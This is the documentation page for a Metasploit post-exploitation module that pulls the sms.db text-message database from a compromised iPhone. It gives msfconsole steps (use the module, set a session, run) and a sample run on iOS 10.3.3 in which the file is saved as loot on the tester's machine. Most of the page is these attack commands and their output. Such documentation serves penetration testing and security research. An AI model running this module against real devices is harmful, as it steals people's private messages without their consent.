783 B
783 B
Description
This module downloads the sms.db file from iPhones
Verification Steps
- Start msfconsole
- Get a session
- Do:
use post/apple_ios/gather/ios_text_gather - Do:
set SESSION <session> - Do:
run - You should get the sms.db file on the iPhone target
Scenarios
Tested on iOS 10.3.3 on an iPhone 5
msf5 > use post/apple_ios/gather/ios_text_gather
msf5 post(apple_ios/gather/ios_text_gather) > set session 1
session => 1
msf5 post(apple_ios/gather/ios_text_gather) > run
[!] SESSION may not be compatible with this module.
[+] sms.db file found
[+] sms.db stored at /Users/space/.msf4/loot/20181101154200_default_192.168.43.49_sms.db.file_591456.txt
[*] Post module execution completed